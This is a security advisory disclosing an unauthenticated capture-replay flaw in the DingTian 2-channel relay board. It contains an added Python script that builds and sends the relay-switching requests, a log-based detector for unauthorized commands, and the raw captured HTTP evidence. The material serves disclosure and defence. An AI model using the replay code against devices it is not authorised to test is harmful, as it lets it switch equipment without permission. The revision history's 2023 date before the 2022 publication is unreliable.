Trustwave SpiderLabs Security Advisory TWSL2022-001:
Authentication Bypass by Capture-replay in DingTian 2 Channel Relay Board/Relay Card

Published: 07/12/2022
Version: 1.0

Vendor: Shenzhen Dingtian Technologies Co.,Ltd
Product: DingTian 2 Channel Relay Board/Relay Card (https://www.dingtian-tech.com/en_us/relay4.html)
Version affected: Firmware V3.1.276A

Product description:
Dingtian is a manufacturer of IoT and access control system smart devices.

Finding 1. Authentication Bypass by Capture-replay

Credit: Victor Hanna of Trustwave
CVE: CVE-2022-29593
CWE-294: Authentication Bypass by Capture-replay
CWE-306: Missing Authentication for Critical Function

The Dingtian DT-R002 2CH relay, running firmware V3.1.276A, accepts replayed relay-control requests, and modified copies of them, from any client. This allows an attacker to switch the devices attached to the relays without authenticating. All traffic to and from the device on its default SSID is sent in clear text over HTTP, so anyone on the network can capture a valid control request. Furthermore, a captured HTTP request to relay_cgi.cgi can be replayed, or rewritten with different relay/on parameters, without any authentication and without a valid signed/authorized request; the only "credential" in the query string is pwd=0. The evidence below shows the HTTP request and response used to turn the relay on and off.
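The following script is an added example and is not part of the Trustwave advisory or any vendor code. It reconstructs the unauthenticated relay_cgi.cgi request from the captured evidence, parses the "&"-delimited response body, and, on the defensive side, scans web-server-style access log lines for relay commands coming from hosts outside an allowlist, which is one way to check the ACL/segmentation remediation actually holds. Assumptions that are mine rather than the advisory's: the device listens on 192.168.7.1:80, the fourth field of the response body reflects the resulting relay state (the two captures differ only in that field), and the log format used for the detection sample. The sample log lines are constructed for the example. Nothing is sent on the network unless send_request() is called deliberately against a device you own.

```python
"""Replay and detection helpers for the DingTian relay_cgi.cgi weakness.

Added example, not part of advisory TWSL2022-001. Assumptions are marked.
"""
import re
import socket
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

DEVICE_HOST = "192.168.7.1"  # default AP address seen in the captured requests
DEVICE_PORT = 80             # assumption: plain HTTP on port 80


def build_relay_request(relay: int, on: bool, host: str = DEVICE_HOST) -> bytes:
    """Build the raw HTTP GET that switches one relay.

    Mirrors the captured request: type=0, time=0, pwd=0 and no session
    cookie, password or signature of any kind. Changing `relay` or `on`
    is the "similar data" case from the advisory.
    """
    state = 1 if on else 0
    path = f"/relay_cgi.cgi?type=0&relay={relay}&on={state}&time=0&pwd=0&"
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: replay-demo",
        "Accept: */*",
        "Connection: close",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_relay_response(raw: bytes) -> Dict[str, object]:
    """Split an HTTP response and decode a body such as '&0&0&0&1&0&'.

    Assumption: field index 3 is the relay's resulting on/off state; the
    captured on/off responses differ only there (…&1&0& vs …&0&0&).
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0].decode("ascii", "replace")
    fields = [f for f in body.decode("ascii", "replace").strip().split("&") if f]
    values = [int(f) for f in fields]
    relay_on: Optional[bool] = (values[3] == 1) if len(values) > 3 else None
    return {"status": status_line, "fields": values, "relay_on": relay_on}


def send_request(request: bytes, host: str = DEVICE_HOST,
                 port: int = DEVICE_PORT, timeout: float = 5.0) -> bytes:
    """Replay `request` over a raw TCP socket and return the full response.

    Only run this against hardware you are authorised to test.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# Constructed access-log lines (common-log style, not from the advisory).
SAMPLE_LOG = """\
192.168.7.23 - - [12/Jul/2022:10:01:02 +0000] "GET /relay_cgi.html HTTP/1.1" 200 512
192.168.7.23 - - [12/Jul/2022:10:01:05 +0000] "GET /relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0& HTTP/1.1" 200 11
192.168.7.99 - - [12/Jul/2022:10:02:11 +0000] "GET /relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0& HTTP/1.1" 200 11
10.0.0.5 - - [12/Jul/2022:10:03:40 +0000] "GET /relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0& HTTP/1.1" 200 11
"""

_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d+)')


def find_unauthorized_relay_commands(log_text: str,
                                     allowed_sources: List[str]) -> List[Dict[str, object]]:
    """Return every relay_cgi.cgi command whose source is not on the allowlist.

    Because the device itself enforces nothing, the allowlist (an ACL on the
    segment's firewall or proxy) is the only control; this check verifies it
    from the log side.
    """
    hits = []
    allowed = set(allowed_sources)
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected format
        src, ts, method, target, status = m.groups()
        parts = urlsplit(target)
        if parts.path != "/relay_cgi.cgi" or src in allowed:
            continue
        q = parse_qs(parts.query)  # trailing '&' yields no empty key
        hits.append({
            "source": src,
            "time": ts,
            "relay": int(q.get("relay", ["-1"])[0]),
            "on": q.get("on", ["0"])[0] == "1",
            "status": int(status),
        })
    return hits
```

Run the detector with `find_unauthorized_relay_commands(SAMPLE_LOG, ["192.168.7.23"])`; the two commands from 192.168.7.99 and 10.0.0.5 are flagged even though the device answered 200 to both, which is exactly why the check has to live outside the device.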
Evidence:

(Switch Relay On)

Request:

    GET /relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0& HTTP/1.1
    Host: 192.168.7.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Referer: http://192.168.7.1/relay_cgi.html
    Cookie: session=4463009

Response:

    HTTP/1.1 200 OK
    Content-Type: text/html
    Content-Length: 11

    &0&0&0&1&0&

(Switch Relay Off)

Request:

    GET /relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0& HTTP/1.1
    Host: 192.168.7.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Referer: http://192.168.7.1/relay_cgi.html
    Cookie: session=4463009

Response:

    HTTP/1.1 200 OK
    Content-Type: text/html
    Content-Length: 11

    &0&0&0&0&0&

Remediation Steps:
No official fix is available. To limit exposure, restrict local access to trusted users only. Additionally, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation.

Revision History:
03/14/2022 - Initial email to vendor
03/28/2022 - 2nd attempt to contact vendor
04/20/2022 - 3rd attempt to contact vendor
06/22/2023 - 4th attempt to contact vendor successful. Will not fix
07/12/2022 - Advisory published

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management.
Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.